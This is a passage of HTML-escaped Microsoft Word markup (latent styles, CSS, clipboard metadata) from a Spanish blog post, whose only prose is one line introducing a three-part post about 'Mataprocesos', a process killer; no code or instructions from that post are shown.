locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" unhidewhenused="false" name="Revision"&gt;   &lt;w:lsdexception locked="false" priority="34" semihidden="false" unhidewhenused="false" qformat="true" name="List Paragraph"&gt;   &lt;w:lsdexception locked="false" priority="29" semihidden="false" unhidewhenused="false" qformat="true" name="Quote"&gt;   &lt;w:lsdexception locked="false" priority="30" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Quote"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="19" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="21" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="31" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Reference"&gt;   &lt;w:lsdexception locked="false" priority="32" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Reference"&gt;   &lt;w:lsdexception locked="false" priority="33" semihidden="false" unhidewhenused="false" qformat="true" name="Book Title"&gt;   &lt;w:lsdexception locked="false" priority="37" name="Bibliography"&gt;   &lt;w:lsdexception locked="false" priority="39" qformat="true" name="TOC Heading"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:"Cambria Math"; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:1; 	mso-generic-font-family:roman; 	mso-font-format:other; 	mso-font-pitch:variable; 	mso-font-signature:0 0 0 0 0 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:""; 	margin:0cm; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman","serif"; 	mso-fareast-font-family:"Times New Roman";} a:link, span.MsoHyperlink 	{mso-style-noshow:yes; 	mso-style-unhide:no; 	color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{mso-style-noshow:yes; 	mso-style-priority:99; 	color:purple; 	mso-themecolor:followedhyperlink; 	text-decoration:underline; 	text-underline:single;} p 	{mso-style-noshow:yes; 	mso-style-unhide:no; 	mso-margin-top-alt:auto; 	margin-right:0cm; 	mso-margin-bottom-alt:auto; 	margin-left:0cm; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman","serif"; 	mso-fareast-font-family:"Times New Roman";} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	font-size:10.0pt; 	mso-ansi-font-size:10.0pt; 	mso-bidi-font-size:10.0pt;} @page Section1 	{size:612.0pt 792.0pt; 	margin:70.85pt 3.0cm 70.85pt 3.0cm; 	mso-header-margin:36.0pt; 	mso-footer-margin:36.0pt; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Tabla normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0cm 5.4pt 0cm 5.4pt; 	mso-para-margin:0cm; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:"Times New Roman"; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: arial;"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;En esta post vamos a hablar de Mataprocesos, como es muy largo lo dividire en 3 partes&lt;/span&gt;&lt;/span&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 12"&gt;&lt;meta name="Originator" content="Microsoft Word 12"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Candres%5CCONFIG%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_filelist.xml"&gt;&lt;link rel="themeData" href="file:///C:%5CDOCUME%7E1%5Candres%5CCONFIG%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_themedata.thmx"&gt;&lt;link rel="colorSchemeMapping" href="file:///C:%5CDOCUME%7E1%5Candres%5CCONFIG%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_colorschememapping.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:trackmoves/&gt;   &lt;w:trackformatting/&gt;   &lt;w:hyphenationzone&gt;21&lt;/w:HyphenationZone&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:donotpromoteqf/&gt;   &lt;w:lidthemeother&gt;ES&lt;/w:LidThemeOther&gt;   &lt;w:lidthemeasian&gt;X-NONE&lt;/w:LidThemeAsian&gt;   &lt;w:lidthemecomplexscript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;    &lt;w:splitpgbreakandparamark/&gt;    &lt;w:dontvertaligncellwithsp/&gt;    &lt;w:dontbreakconstrainedforcedtables/&gt;    &lt;w:dontvertalignintxbx/&gt;    &lt;w:word11kerningpairs/&gt;    &lt;w:cachedcolbalance/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;   &lt;m:mathpr&gt;    &lt;m:mathfont val="Cambria Math"&gt;    &lt;m:brkbin val="before"&gt;    &lt;m:brkbinsub val="--"&gt;    &lt;m:smallfrac val="off"&gt;    &lt;m:dispdef/&gt;    &lt;m:lmargin val="0"&gt;    &lt;m:rmargin val="0"&gt;    &lt;m:defjc val="centerGroup"&gt;    &lt;m:wrapindent val="1440"&gt;    &lt;m:intlim val="subSup"&gt;    &lt;m:narylim val="undOvr"&gt;   &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" defunhidewhenused="true" defsemihidden="true" defqformat="false" defpriority="99" latentstylecount="267"&gt;   &lt;w:lsdexception locked="false" priority="0" semihidden="false" unhidewhenused="false" qformat="true" name="Normal"&gt;   &lt;w:lsdexception locked="false" priority="9" semihidden="false" unhidewhenused="false" qformat="true" name="heading 1"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 2"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 3"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 4"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 5"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 6"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 7"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 8"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 9"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 1"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 2"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 3"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 4"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 5"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 6"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 7"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 8"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 9"&gt;   &lt;w:lsdexception locked="false" priority="35" qformat="true" name="caption"&gt;   &lt;w:lsdexception locked="false" priority="10" semihidden="false" unhidewhenused="false" qformat="true" name="Title"&gt;   &lt;w:lsdexception locked="false" priority="1" name="Default Paragraph Font"&gt;   &lt;w:lsdexception locked="false" priority="11" semihidden="false" unhidewhenused="false" qformat="true" name="Subtitle"&gt;   &lt;w:lsdexception locked="false" priority="0" name="Hyperlink"&gt;   &lt;w:lsdexception locked="false" priority="22" semihidden="false" unhidewhenused="false" qformat="true" name="Strong"&gt;   &lt;w:lsdexception locked="false" priority="20" semihidden="false" unhidewhenused="false" qformat="true" name="Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="0" name="Normal (Web)"&gt;   &lt;w:lsdexception locked="false" priority="59" semihidden="false" unhidewhenused="false" name="Table Grid"&gt;   &lt;w:lsdexception locked="false" unhidewhenused="false" name="Placeholder Text"&gt;   &lt;w:lsdexception locked="false" priority="1" semihidden="false" unhidewhenused="false" qformat="true" name="No Spacing"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" unhidewhenused="false" name="Revision"&gt;   &lt;w:lsdexception locked="false" priority="34" semihidden="false" unhidewhenused="false" qformat="true" name="List Paragraph"&gt;   &lt;w:lsdexception locked="false" priority="29" semihidden="false" unhidewhenused="false" qformat="true" name="Quote"&gt;   &lt;w:lsdexception locked="false" priority="30" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Quote"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 5"&gt;   